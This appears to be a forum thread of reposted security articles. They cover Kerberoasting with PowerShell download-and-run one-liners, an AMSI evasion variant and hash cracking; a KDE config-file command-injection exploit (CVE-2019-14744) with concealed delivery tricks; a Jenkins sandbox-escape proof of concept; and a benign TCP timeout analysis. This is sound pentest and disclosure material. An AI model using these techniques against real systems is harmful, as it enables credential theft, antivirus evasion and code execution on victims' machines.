-
Posts
18752 -
Joined
-
Last visited
-
Days Won
725
Everything posted by Nytro
-
How to: Kerberoast like a boss Neil Lines 18 Sep 2019 Kerberoasting: by default, all standard domain users can request a copy of all service accounts along with their correlating password hashes. Crack these and you could have administrative privileges. But that’s so 2014. Why write a blog post about this in 2019 then? It still works well, yet there are plenty of tips and tricks that can be useful to bypass restrictions that you come up against. That’s what this post is about. The process required to perform Kerberoasting is trivial thanks to the original research by Tim Medin, but what more can we learn? Everyone needs a lab Having a lab is key to testing, if you want to attempt any of the exploitation detailed in this blog, I would recommend building your own virtual Windows domain using whichever virtualisation solution you prefer. You can download free 90-day Windows host VM’s from the following link. https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 180-day trial ISO’s of Windows server 2008R2, 2012R2, 2016 and 2019 can be downloaded from the following links. https://www.microsoft.com/en-gb/download/details.aspx?id=11093 https://www.microsoft.com/en-gb/evalcenter/evaluate-windows-server-2012-r2 Not created a virtual domain before? Its easy, this post explains all. https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/ Kerberoasting In 2014 Tim Medin did a talk called Attacking Kerberos: Kicking the Guard Dog of Hades where he detailed the attack he called ‘Kerberoasting’. This post won’t revisit the how’s and why’s of how Kerberoasting works, but it will detail a number of different techniques showing you how to perform the exploitation. It will also include the results from testing each method using my lab to help demonstrate. There’s more on the theory behind Kerberoasting. http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/ …you can also watch Tim’s talk. https://www.youtube.com/watch?v=HHJWfG9b0-E Quick update Kerberoasting results in you collecting a list of service accounts along with their correlating password hashes from a local domain controller (DC). You do need to reverse any collected hashes but it’s well worth attempting the process because service accounts are commonly part of the domain administrative (DA), enterprise administrative (EA) or local administrator group. Blast in the past A few years back while PowerShell (PS) was ruling the threat landscape, it was the go-to method for remote red teams or internal infrastructure testing. Back then you could simply fire up a PS session, copy and paste a PS one-liner and be well on the way to collecting an account which belongs to the DA group. Let’s go back in time for a minute and review using a PS one-liner to perform Kerberoasting. We start off by opening PowerShell then running a dir command to view the contents of our user’s home directory. Then copy and paste the following one-liner into PS and run it by pressing enter. powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" What does this do? The above one-liner instructs PS to relaunch, but this time set the ExecutionPolicy to bypass. This enables untrusted scripts to be run. The ‘New-Object System.Net.WebClient).DownloadString’ is used to download the Invoke-Kerberoast.ps1 script from the defined location, followed by loading the script in to memory. The final section Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt runs the Kerberoast request, followed by detailing how the results should be returned. In the above example they are set to match hashcat’s password cracking tools file format requirements, followed by the defined name and file type. In short order: it downloads the script, runs it all in RAM and outputs the results ready for you to crack using hashcat. After running the one-liner, you should see no response. To review the results simply rerun the dir command to reveal created file named ‘kerb-Haah0.txt’. Manually open the directory then double click on the created file to open it in notepad. If you’re working remotely you can use the type command followed by the name of the .txt file you wish to view. The following screenshot details an extract from the collection of two service accounts from my lab. While it looks confusing to start with the word following the * character is the username of the service account, so in the case of this demo the collected service account usernames are user1 and DA1. Personally, I’d review the domain groups for each collected service account, there is a time cost associated with the reversal process of attempting to crack the collected hashes. If an account will not assist you in privilege escalation, I wouldn’t waste the time trying reverse it. Enumeration of user1 reveals it’s a typical domain user. net user /domain user1 Enumeration of the account titled DA1 reveals that its part of the DA and EA groups, meaning it has unrestricted administrative access over all domain joined machines and users. net user /domain da1 The Reversal To reverse collected Kerberoasted hashes you can use hashcat, here’s how to do that. The previous section titled ‘Blast in the past’ resulted in the collection of a service account with the username of ‘DA1’. To start the reversal process you need to copy the complete hash starting with the first section ‘$krb5tgs’ all the way to the end and then paste this into a file. You can add as many of the collected hashes as you like but just make sure each one is on its own new line. The screenshot below shows an extract of the collected ‘DA1’ hash. For this demo I’m using hashcat version 5.1.0. You can download a copy of from the following location. https://hashcat.net/hashcat/ I run hashcat locally on my laptop which uses Windows 10 as a base OS. Although the graphics card is below average for a similar laptop it can still chug through a Kerberoasted hash using a good size dictionary in a short time. The hashcat command to reverse Kerberoasted hashes is as follows hashcat65.exe -m 13100 hash.txt wordlist.txt outputfile.txt This shows the command I ran to reverse the ‘da1’ hash. hashcat64.exe -m 13100 "C:\Users\test\Documents\Kerb1.txt" C:\Users\test\Documents\Wordlists\Rocktastic12a --outfile="C:\Users\test\Documents\CrackedKerb1.txt" The above process took 44 seconds to recover the password. The screenshot shows the response from hashcat on completion. The 1/1 indicates that of the provided 1 hash, 1 was reversed. Finally, opening the file titled ‘CrackedKer1.txt’ reveals the reversed password of ‘Passw0rd!’ which is always placed at the end of the hash. To verify the account had administrative rights across my lab domain I tried the account with an RDP session to my local DC. It used to be fun Windows 10 with its fancy Defender and Antimalware Scan Interface (AMSI) has mostly ruined PS one-liners for us, so how can we get around this? Well, if your targets are using defender (which is still quite rare in the enterprise wild) you’re in luck, as there are some very well documented bypasses for AMSI. Mohammed Danish published a post titled How to Bypass AMSI with an Unconventional PowerShell Cradle, you can read it here. https://medium.com/@gamer.skullie/bypassing-amsi-with-an-unconventional-powershell-cradle-6bd15a17d8b9 Quick version: the Net.WebClient function, which is commonly used is used in one-liners, has a signature in AMSI by replacing this function with the System.Net.WebRequest clas. The one-liner runs because there is no signature for it. The following weaponises that AMSI bypass with the Kerberoast request. $webreq = [System.Net.WebRequest]::Create(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1’); $resp=$webreq.GetResponse(); $respstream=$resp.GetResponseStream(); $reader=[System.IO.StreamReader]::new($respstream); $content=$reader.ReadToEnd(); IEX($content); Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt It doesn’t use AMSI This was a new one to me. While on a client site recently I tried the Kerberoast one-liner, but it was blocked by their AV. So I thought I would try the above AMSI bypass which was also blocked. The problem was that their AV solution did not rely on Microsoft AMSI to signature potential threats, and it had its own solution for verifying potential malicious PS scripts. My initial thoughts were, what do I do now? Well this is where Rubeus (a C# toolset for raw Kerberos interaction and abuses) comes out to play. So, while they block most forms of PS, do they block C#? The answer is not a lot do at present. You can read more about Rubeus here. https://github.com/GhostPack/Rubeus Rubeus comes uncompiled. Don’t stress over this though as it’s not as hard to compile C# scripts as it might seem. For this demonstration I used Microsoft’s free visual studio which I downloaded and installed into a Windows 10 VM. https://visualstudio.microsoft.com/vs/community/ During the install process visual studio prompts you to select what you need.I ticked the following two. Following the installation of visual studio, git clone the Rebeus project from https://github.com/GhostPack/Rubeus and then to start the process double click the on .sln file. BTW an SLN file is a structure file used for organizing projects in Microsoft Visual Studio. Finally, to compile Rubeus click on the Start button. After running once, a complied .exe should have been created in the Debug directory which can be found under the Rubeus-master\Rubeus\ directories. This is the full directory location of the compiled .exe I created for this post. C:\Users\IEUser\Desktop\Rubeus-master\Rubeus\bin\Debug Following the compiling of Rubeus, you can run it to perform a Kerberoast with the following command. Rubeus.exe kerberoast /format:hashcat > Hash1 The .exe should run unprompted but I did notice an error in my Windows 10 VM which I downloaded from the developer.microsoft.com site. The error prompted me to install .NET Framework. You shouldn’t need to do this on target machine as you would typically find .NET already installed in production environments. Running it in my Windows 7 VM worked first time and resulted in the collection of both service accounts. These are the details from an extract of the ‘DA1’ account as collected using Rubeus. While the command defines the output as a hashcat format, it requires a little tweaking to be used in hashcat. The following section demonstrates what’s required to prepare the hash for the reversal process. Open the output file and highlight all of the hash that you wish to reverse and then copy and paste it into notepad++. Then highlight the first blank space right up to the first line. Then open Find and select the Replace tab. Leave the ‘Find what’ defined as the space, and add nothing to the ‘replace with’ section, then click ‘Replace All’. This should result in making the hash complete across one line, which is now ready for hashcat. No more Windows! What if you can’t bypass the AV restrictions? How about using your own Kali Linux- any flavour will do. For this demo I’m using Impacket. https://github.com/SecureAuthCorp/impacket IYou can download it from github by running the following: git clone https://github.com/SecureAuthCorp/impacket.git Before you can run the Kerberoast request you need to verify that you can ping the full internal Microsoft domain name from your Kali box. If you get no reply you need to add a static DNS entry. To do this use your edit program of choice, and add a single entry for the full domain referencing the IP address of their DC. gedit /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali 192.168.1.200 server1.hacklab.local Then try and ping the full domain name again. If you get a reply it’s looking good. ping server1.hacklab.local PING server1.hacklab.local (192.168.1.200) 56(84) bytes of data. 64 bytes from server1.hacklab.local (192.168.1.200): icmp_seq=1 ttl=128 time=3.25 ms 64 bytes from server1.hacklab.local (192.168.1.200): icmp_seq=2 ttl=128 time=0.519 ms To run the Kerberoast request from Impacket you need to move into the example’s directory. root@Kai:~# cd Desktop/ root@Kali:~/Desktop# cd impacket/ root@Kali:~/Desktop/impacket# cd examples/ …and finally the script you need to run is titled GetUserSPNs.py. The commands are as follows. ./GetUserSPNs.py -request Add-Full-Domain-Name/Add-User-Name A nice addition to this is the inclusion of the -dc-ip Add-DC-IP-Address switch which enables you to define which DC to point the request at. If all works as expected you’ll be prompted for the users password. After submitting that you should see the service accounts with their hashes. Final Thoughts Kerberoasting collects the service accounts along with their correlating password hash. It is possible to reverse these hashes in a relatively short time if the password is based on a weakly defined word. Enterprises should review their own service accounts in active directory to verify if they are actually necessary. The service accounts that are required should be set with a complex non-dictionary based password. Sursa: https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/
-
The Year of Linux on the Desktop (CVE-2019-14744) [ kde , code execution ] 0x01 Introduction There’s been a lot of controversy regarding the KDE KConfig vulnerability along with the way I decided to disclose the issue (full disclosure). Some have even decided to write up blog posts analyzing this vulnerability, despite the extremely detailed proof-of-concept I provided. That’s why in this post I’m going to detail how I found the vulnerability, what led me to finding it, and what my thought process was throughout the research. Firstly, to summarize: KDE Frameworks (kf5/kdelibs) < 5.61.0 is vulnerable to a command injection vulnerability in the KConfig class. This can be directly exploited by having a remote user view a specially crafted configuration file. The only interaction required is viewing the file in a file browser and/or on the desktop. Sure, this requires a user downloading a file, however it’s not hard to hide said file at all. Exploit demo uploaded by Bleepingcomputer 0x02 Discovery After I had finished publishing the last couple EA Origin vulnerabilities, I really wanted to get back on Linux and focus on vulnerabilities specific to Linux distributions. I figured that with Origin’s client being written using the Qt framework, and the fact that KDE was also built using the Qt framework, that I would maybe try and look into that. In turn, it led me to checking out KDE. Another factor that probably played a part in this whole process was that I had been using KDE on one of my laptops, and was familiar enough with it that I could map out attack surface fairly easily. The first lightbulb moment Most of the research I was doing at the time was shared with a good friend of mine who has helped me previously with other vulnerabilities. Thankfully this makes it easy for me to share the thought process with you folks. Because I was looking into KDE, I decided to first look at their default image viewer (gwenview). The idea behind this was, “if I can find a vulnerability in the default image viewer, that should be a fairly reliable exploit”. Naturally, if we can host our payload in an image and trigger it when someone views it or opens it in their browser, it makes things really easy. The first lightbulb moment came to me when I realized that gwenview actually compiles a list of recently viewed files, and uses the KConfig configuration syntax to set these entries. What stood out to me was the shell variables. Massive red flag. Depending on how these variables are being interpreted, we may be able to achieve command execution. Clearly in File1 it’s calling $HOME/Pictures/kdelol.gif and resolving the variable, otherwise how would would gwenview figure out where the file is? To see if these configuration entries were actually interpreting shell variables/commands, I added some of my own input in Name2 After looking in gwenview… nothing different? Okay that kind of sucks, so I went back to my configuration file to see if anything changed. Turns out, gwenview interprets the shell variables when it gets launched, so in order for those recent files to be interpreted, gwenview must be freshly launched after the configuration file has been updated. Once that happens, the command will execute. As you can see, the command in the Name2 entry got interpreted, and resolved the output of the $(whoami). The reason why it reverted back to Name1 is because I duplicated entries with File. This doesn’t make much difference for us at the moment, as long as our commands are executing, that should be enough for us to move forward. Initially, I had no idea what the $e was supposed to mean, so I did the necessary digging and found the documentation for KDE System Configuration files. Turns out the $e is there to tell KDE to allow shell expansions. At this point, it wasn’t a vulnerability or a glaring issue at all. It definitely seemed dangerous though, and I was convinced more could be done to abuse it. After discovering KDE allows shell expansion in their config files, I sent a message to my buddy detailing what I had just learned. Here I present the idea that maybe a content injection type payload would be possible via the filename. Unfortunately I tried this, and KDE seems to properly parse new entries and escape them by adding an additional $. Either way, if you were to send someone a file with said payload, that would obviously be suspicious. Kind of defeats the purpose. At this point I wasn’t sure how to go about exploiting this issue. Surely there must be some way, this seems like a really bad idea. With that in mind, I got tired of trying the same thing over again and reading the same docs, so I took a break. The second lightbulb moment Eventually I came back to KDE and was browsing a directory where I needed to see hidden files (dotfiles). I went to Control > Show Hidden Files, and realized all of a sudden it created a .directory file in the current working directory. Okay, interesting. Being unsure of what this .directory file was, I looked at the contents. [Dolphin] Timestamp=2019,8,11,23,42,5 Version=4 [Settings] HiddenFilesShown=true The first thing I noticed was that it seemed to be consistent with the syntax that KDE uses for all of it’s configuration files. I instantly wondered if maybe those entries could be injected with a shell command, seeing as the .directory file was being read and processed by KConfig the moment the directory was opened. I tried injecting the version entry with my shell command, but it kept getting over-written. Didn’t seem like it was going to work. Now I was thinking “Hm, maybe KDE has some existing .directory files that could tell me something”. So I looked for them. zero@pwn$ locate *.directory /usr/share/desktop-directories/kf5-development-translation.directory /usr/share/desktop-directories/kf5-development-webdevelopment.directory /usr/share/desktop-directories/kf5-development.directory /usr/share/desktop-directories/kf5-editors.directory /usr/share/desktop-directories/kf5-edu-languages.directory /usr/share/desktop-directories/kf5-edu-mathematics.directory /usr/share/desktop-directories/kf5-edu-miscellaneous.directory [...] For an example, let’s take kf5-development-translation.directory and look at the contents. kf5-development-translation.directory: [Desktop Entry] Type=Directory Name=Translation Name[af]=Vertaling [...] Icon=applications-development-translation I noticed that within the [Desktop Entry] tag, certain entries were being called that had keys. For example, the af key on the name entry: Name[af]=Vertaling Seeing as KConfig is definitely checking entries for keys, let’s try adding a key with the $e option like the config documentation mentioned. Another thing that really interested me at this point was the Icon entry. Here it gives you the option to set the icon of either the current directory, or the file itself. If the file is simply named .directory, it will set properties for the directory it’s in. If the file is named payload.directory, only the payload.directory file will have the Icon, not the parent directory. Why does it work like this? We’ll get into that in a second. This is really appealing, cuz this means our Icon entry can get called without even opening a file, it can get called simply be navigating to a certain directory. If injecting a command with the $e key works here… dang, that was a little too easy, wasn’t it? Surely, you already know the outcome of this story when using the following payload: payload.directory [Desktop Entry] Type=Directory Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) 0x03 Under the Hood Like with any vulnerability, having access to the code can make our lives a lot easier. Having a full understanding of our “exploit” is essential in order to maximize impact and produce a good quality report. At this moment I had identified a few things: Issue is actually a design flaw in KDE’s configuration Can be triggered by simply viewing a file/folder The issue itself is clearly in KConfig, however if we can’t get the configuration entries called… there’s no way of triggering it. So there’s a couple parts to this. With this information, I decided to browse the code for KConfig and KConfigGroup. Here, I found a function called readEntry(). kconfiggroup.cpp We can see it’s doing a few things Checks for key in entry. If expand ($e) key exists, expandString() on the value being read. Obviously now we need to find out what expandString() is doing. Browsing around the docs we find the function in kconfig.cpp kconfig.cpp TL;DR: Checks for $ characters. Checks to see if () follows. Runs popen on the value Returns the value (had to cut off that part) That pretty much explains most of how this works, however I wanted to follow the code and find exactly where readEntry(), then expandString(), was getting called and executing our command. After searching around for quite a while on github, I determined that there was a function specific to desktop files, and that this function is called readIcon(), which is located in the KDesktopFile class. kdesktopfile.cpp Basically it just uses the readEntry() function and grabs the Icon from the configuration file. Knowing this function exists… we can go back to our sources and search for readIcon(). I had only been messing with .directory files up until now, but after reading some more of the code, it turns out that this KDesktopFile class is used for more than just .directory files. It’s used for .desktop files too (who would have thought??????? lol). Because KDE treats .directory and .desktop files as KDesktopFile’s and because the icon gets called from this class (or any other class, it doesn’t even matter in this case), our command will execute if we inject our command there. 0x04 Exploitation Finding ways to trigger readEntry SMB share method We know that if we can get someone to view a .directory or .desktop file, readEntry() gets called, and will thus execute our code. I figured there must be more ways to trigger readEntry. Ideally, fully remote, with less interaction, i.e NOT downloading a file. The idea that came to mind to solve this was to use an smb:// URI in an iframe to serve a remote share that the user would connect to, ultimately having our .directory file executed the moment they connected. Very unfortunately, KDE is unlike GNOME in the sense that it does NOT automatically mount remote shares, and does NOT trust .desktop/.directory files if they don’t already exist on the filesystem. This essentially defeats the purpose of having a user accidentally browse a remote share and have arbitrary code executed. It’s funny, because automounting remote shares has been a feature that KDE users have been asking for for a very long time. Had they implemented it, this attack could’ve been quite a bit more dangerous. Anyways, we can’t automatically mount remote shares, but KDE does have a client that’s meant to facilitate working with SMB shares that is apparently common among KDE users. This application is called SMB4k and doesn’t actually ship with KDE. Once a share has been mounted using SMB4k, it can be accessed in Dolphin. If we have write access to a public SMB share, (that people are browsing via smb4k) we can plant a malicious config file that would appear as the following when viewed in Dolphin, ultimately achieving code execution remotely. ZIP method (nested config) Sending someone a .directory or .desktop file would obviously raise a lot of questions, right? I’d imagine so. That’s what most of the commentary around this subject seems to suggest. Why doesn’t that matter? Because nesting these files and forging their file extensions is the easiest thing you could possibly imagine. We have options here. The first option is to create a nested directory, which will have its Icon loaded as soon as the parent directory is opened. This executes the code without even seeing or knowing the contents of the directory. For example, look at this httpd download from the Apache website. There’s no way that an unsuspecting user would be able to identify that there’s a malicious .directory file nested in one of those directories. If you’re expecting it, sure, but generally speaking, no suspicion would arise. nested directory payload $ mkdir httpd-2.4.39 $ cd httpd-2.4.39 $ mkdir test; cd test $ vi .directory [Desktop Entry] Type=Directory Icon[$e]=$(echo${IFS}0>~/Desktop/zer0.lol&) ZIP the archive & send it off. The moment the httpd-2.4.39 folder is opened in the file manager, the test directory will attempt to load the Icon, resulting in command execution. ZIP method (lone config file) The second option we have, is to “fake” our file extensions. I actually forgot to document this method in the original proof-of-concept, but that’s why I’m including it here now. As it turns out, when KDE doesn’t recognize a file extension, it attempts to be “smart”, and assign a mimetype. If the file contains [Desktop Entry] at the beginning, it’s assigned the application/x-desktop mimetype. Ultimately allowing the file to be processed by KConfig on load. Knowing this, we can make a fake TXT file with a character that closely resembles a “t”. To demonstrate how easy hiding the file is, I’ve used the httpd package again. Obviously the icon gives it away, but still, it’s much more discreet than having a random .desktop/.directory file. Again, as soon as this folder is opened, the code gets executed. Drag & Drop method (lone config file) Honestly this method is relatively useless, but I thought it would be cool in the demo, along with adding a potential social-engineering vector to the delivery of this payload. While I was picking apart KDE, I realized (accidentally) that you can actually drag and drop remote resources, and have a file-transfer trigger. This is all enabled by the KIO (kde input/output module) This basically allows users to drag and drop remote files and transfer them onto their local filesystem. Essentially, if we can SE a user to drag and drop a link, the file transfer will trigger and ultimately execute the arbitrary code the moment the file is loaded onto the system. 0x05 Outro Thanks to the KDE team, you no longer have to worry about this issue as long as the necessary patches have been made. Huge kudos to them for getting this issue patched within approximately 24 hours of being made aware. That’s a very impressive response. I’d also like to give big shoutout to the following friends of mine who were a huge help throughout the entire process. Check out the references for the weaponized payload Nux shared. Nux yuu References KDE 4/5 KDesktopfile (KConfig) Command Injection KDE Project Security Advisory KDE System Administration KDE ARBITRARY CODE EXECUTION AUTOCLEAN by Nux Sursa: https://zero.lol/2019-08-11-the-year-of-linux-on-the-desktop/
-
Jenkins – Groovy Sandbox breakout (SECURITY-1538 / CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400) Recently, I discovered a sandbox breakout in the Groovy Sandbox used by the Jenkins script-security Plugin in their Pipeline Plugin for build scripts. We responsibly disclosed this vulnerability and in the current version of Jenkins it has been fixed and the according Jenkins Security Advisory 2019-09-12 has been published. In this blogpost I want to report a bit on the technical details of the vulnerability. Description The groovy sandbox transforms some AST nodes of the script to add security checks. For example ret = Runtime.getRuntime().exec("id") will be transformed to something like ret = Sandbox.call(Sandbox.call(Runtime.class, "getRuntime", []), "exec", ["id"]) Sandbox.call will check at runtime if the script can call the method with the given arguments. However, there were some cases in which the transformer did not transform child expressions, which then could do anything. 1.(untransformed)() 1.(untransformed) = 1 sometimesuntransformed++ In the first case the method name of a function call was not transformed. Who thought that a function name needs to be an identifier? The second case has the same problem but for the name of a property expression as the left-hand side of an assignment. For the last case the expression needs to not be of the form of a++, a++, a.b++. And in a.(b)++, b is also not transformed. This allowed everyone who was able to supply build scripts to execute commands as the Jenkins Master. PoC The script-security and pipeline plugins are required but installed by default. A user with job/configure permission is needed to change the script code. The following pipeline script will run the id shell command and throw and error with its output. @NonCPS def e(){ 1.({throw new Error("id".execute().text)}())(); } e(); @NonCPS is needed to disable a transformation step that would make problems. The expected output of this script after a build is: As seen in the output the command did run as Jenkins without approval of an administrator. Disclosure Timeline We responsibly disclosed this vulnerability and in the current version of Jenkins, it has been fixed and the according Jenkins Security Advisory 2019-09-12 has been published. The disclosure timeline was as follows: 12.09.2019 – Public disclosure of vulnerability 10.09.2019 – Vulnerabilities were assigned CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400 06.09.2019 – Report Conclusions Sandboxing is hard and a little oversight (that property names can be arbitrary expressions) can lead to escapes. I strongly recommend to update to the most current version if you use Jenkins, where this issue has been fixed and of course ensure proper patch and vulnerability management processes to be in place in general. Best, Nils Sursa: https://insinuator.net/2019/09/jenkins-groovy-sandbox-breakout-security-1538-cve-2019-10393-cve-2019-10394-cve-2019-10399-cve-2019-10400/
-
When TCP sockets refuse to die Marek Majkowski September 20, 2019 3:53PM While working on our Spectrum server, we noticed something weird: the TCP sockets which we thought should have been closed were lingering around. We realized we don't really understand when TCP sockets are supposed to time out! Image by Sergiodc2 CC BY SA 3.0 In our code, we wanted to make sure we don't hold connections to dead hosts. In our early code we naively thought enabling TCP keepalives would be enough... but it isn't. It turns out a fairly modern TCP_USER_TIMEOUT socket option is equally as important. Furthermore it interacts with TCP keepalives in subtle ways. Many people are confused by this. In this blog post, we'll try to show how these options work. We'll show how a TCP socket can timeout during various stages of its lifetime, and how TCP keepalives and user timeout influence that. To better illustrate the internals of TCP connections, we'll mix the outputs of the tcpdump and the ss -o commands. This nicely shows the transmitted packets and the changing parameters of the TCP connections. SYN-SENT Let's start from the simplest case - what happens when one attempts to establish a connection to a server which discards inbound SYN packets? The scripts used here are available on our Github. $ sudo ./test-syn-sent.py # all packets dropped 00:00.000 IP host.2 > host.1: Flags [S] # initial SYN State Recv-Q Send-Q Local:Port Peer:Port SYN-SENT 0 1 host:2 host:1 timer:(on,940ms,0) 00:01.028 IP host.2 > host.1: Flags [S] # first retry 00:03.044 IP host.2 > host.1: Flags [S] # second retry 00:07.236 IP host.2 > host.1: Flags [S] # third retry 00:15.427 IP host.2 > host.1: Flags [S] # fourth retry 00:31.560 IP host.2 > host.1: Flags [S] # fifth retry 01:04.324 IP host.2 > host.1: Flags [S] # sixth retry 02:10.000 connect ETIMEDOUT Ok, this was easy. After the connect() syscall, the operating system sends a SYN packet. Since it didn't get any response the OS will by default retry sending it 6 times. This can be tweaked by the sysctl: $ sysctl net.ipv4.tcp_syn_retries net.ipv4.tcp_syn_retries = 6 It's possible to overwrite this setting per-socket with the TCP_SYNCNT setsockopt: setsockopt(sd, IPPROTO_TCP, TCP_SYNCNT, 6); The retries are staggered at 1s, 3s, 7s, 15s, 31s, 63s marks (the inter-retry time starts at 2s and then doubles each time). By default the whole process takes 130 seconds, until the kernel gives up with the ETIMEDOUT errno. At this moment in the lifetime of a connection, SO_KEEPALIVE settings are ignored, but TCP_USER_TIMEOUT is not. For example, setting it to 5000ms, will cause the following interaction: $ sudo ./test-syn-sent.py 5000 # all packets dropped 00:00.000 IP host.2 > host.1: Flags [S] # initial SYN State Recv-Q Send-Q Local:Port Peer:Port SYN-SENT 0 1 host:2 host:1 timer:(on,996ms,0) 00:01.016 IP host.2 > host.1: Flags [S] # first retry 00:03.032 IP host.2 > host.1: Flags [S] # second retry 00:05.016 IP host.2 > host.1: Flags [S] # what is this? 00:05.024 IP host.2 > host.1: Flags [S] # what is this? 00:05.036 IP host.2 > host.1: Flags [S] # what is this? 00:05.044 IP host.2 > host.1: Flags [S] # what is this? 00:05.050 connect ETIMEDOUT Even though we set user-timeout to 5s, we still saw the six SYN retries on the wire. This behaviour is probably a bug (as tested on 5.2 kernel): we would expect only two retries to be sent - at 1s and 3s marks and the socket to expire at 5s mark. Instead we saw this, but also we saw further 4 retransmitted SYN packets aligned to 5s mark - which makes no sense. Anyhow, we learned a thing - the TCP_USER_TIMEOUT does affect the behaviour of connect(). SYN-RECV SYN-RECV sockets are usually hidden from the application. They live as mini-sockets on the SYN queue. We wrote about the SYN and Accept queues in the past. Sometimes, when SYN cookies are enabled, the sockets may skip the SYN-RECV state altogether. In SYN-RECV state, the socket will retry sending SYN+ACK 5 times as controlled by: $ sysctl net.ipv4.tcp_synack_retries net.ipv4.tcp_synack_retries = 5 Here is how it looks on the wire: $ sudo ./test-syn-recv.py 00:00.000 IP host.2 > host.1: Flags [S] # all subsequent packets dropped 00:00.000 IP host.1 > host.2: Flags [S.] # initial SYN+ACK State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,996ms,0) 00:01.033 IP host.1 > host.2: Flags [S.] # first retry 00:03.045 IP host.1 > host.2: Flags [S.] # second retry 00:07.301 IP host.1 > host.2: Flags [S.] # third retry 00:15.493 IP host.1 > host.2: Flags [S.] # fourth retry 00:31.621 IP host.1 > host.2: Flags [S.] # fifth retry 01:04:610 SYN-RECV disappears With default settings, the SYN+ACK is re-transmitted at 1s, 3s, 7s, 15s, 31s marks, and the SYN-RECV socket disappears at the 64s mark. Neither SO_KEEPALIVE nor TCP_USER_TIMEOUT affect the lifetime of SYN-RECV sockets. Final handshake ACK After receiving the second packet in the TCP handshake - the SYN+ACK - the client socket moves to an ESTABLISHED state. The server socket remains in SYN-RECV until it receives the final ACK packet. Losing this ACK doesn't change anything - the server socket will just take a bit longer to move from SYN-RECV to ESTAB. Here is how it looks: 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # initial ACK, dropped State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,1sec,0) ESTAB 0 0 host:2 host:1 00:01.014 IP host.1 > host.2: Flags [S.] 00:01.014 IP host.2 > host.1: Flags [.] # retried ACK, dropped State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,1.012ms,1) ESTAB 0 0 host:2 host:1 As you can see SYN-RECV, has the "on" timer, the same as in example before. We might argue this final ACK doesn't really carry much weight. This thinking lead to the development of TCP_DEFER_ACCEPT feature - it basically causes the third ACK to be silently dropped. With this flag set the socket remains in SYN-RECV state until it receives the first packet with actual data: $ sudo ./test-syn-ack.py 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # delivered, but the socket stays as SYN-RECV State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,7.192ms,0) ESTAB 0 0 host:2 host:1 00:08.020 IP host.2 > host.1: Flags [P.], length 11 # payload moves the socket to ESTAB State Recv-Q Send-Q Local:Port Peer:Port ESTAB 11 0 host:1 host:2 ESTAB 0 0 host:2 host:1 The server socket remained in the SYN-RECV state even after receiving the final TCP-handshake ACK. It has a funny "on" timer, with the counter stuck at 0 retries. It is converted to ESTAB - and moved from the SYN to the accept queue - after the client sends a data packet or after the TCP_DEFER_ACCEPT timer expires. Basically, with DEFER ACCEPT the SYN-RECV mini-socket discards the data-less inbound ACK. Idle ESTAB is forever Let's move on and discuss a fully-established socket connected to an unhealthy (dead) peer. After completion of the handshake, the sockets on both sides move to the ESTABLISHED state, like: State Recv-Q Send-Q Local:Port Peer:Port ESTAB 0 0 host:2 host:1 ESTAB 0 0 host:1 host:2 These sockets have no running timer by default - they will remain in that state forever, even if the communication is broken. The TCP stack will notice problems only when one side attempts to send something. This raises a question - what to do if you don't plan on sending any data over a connection? How do you make sure an idle connection is healthy, without sending any data over it? This is where TCP keepalives come in. Let's see it in action - in this example we used the following toggles: SO_KEEPALIVE = 1 - Let's enable keepalives. TCP_KEEPIDLE = 5 - Send first keepalive probe after 5 seconds of idleness. TCP_KEEPINTVL = 3 - Send subsequent keepalive probes after 3 seconds. TCP_KEEPCNT = 3 - Time out after three failed probes. $ sudo ./test-idle.py 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] State Recv-Q Send-Q Local:Port Peer:Port ESTAB 0 0 host:1 host:2 ESTAB 0 0 host:2 host:1 timer:(keepalive,2.992ms,0) # all subsequent packets dropped 00:05.083 IP host.2 > host.1: Flags [.], ack 1 # first keepalive probe 00:08.155 IP host.2 > host.1: Flags [.], ack 1 # second keepalive probe 00:11.231 IP host.2 > host.1: Flags [.], ack 1 # third keepalive probe 00:14.299 IP host.2 > host.1: Flags [R.], seq 1, ack 1 Indeed! We can clearly see the first probe sent at the 5s mark, two remaining probes 3s apart - exactly as we specified. After a total of three sent probes, and a further three seconds of delay, the connection dies with ETIMEDOUT, and final the RST is transmitted. For keepalives to work, the send buffer must be empty. You can notice the keepalive timer active in the "timer:(keepalive)" line. Keepalives with TCP_USER_TIMEOUT are confusing We mentioned the TCP_USER_TIMEOUT option before. It sets the maximum amount of time that transmitted data may remain unacknowledged before the kernel forcefully closes the connection. On its own, it doesn't do much in the case of idle connections. The sockets will remain ESTABLISHED even if the connectivity is dropped. However, this socket option does change the semantics of TCP keepalives. The tcp(7) manpage is somewhat confusing: Moreover, when used with the TCP keepalive (SO_KEEPALIVE) option, TCP_USER_TIMEOUT will override keepalive to determine when to close a connection due to keepalive failure. 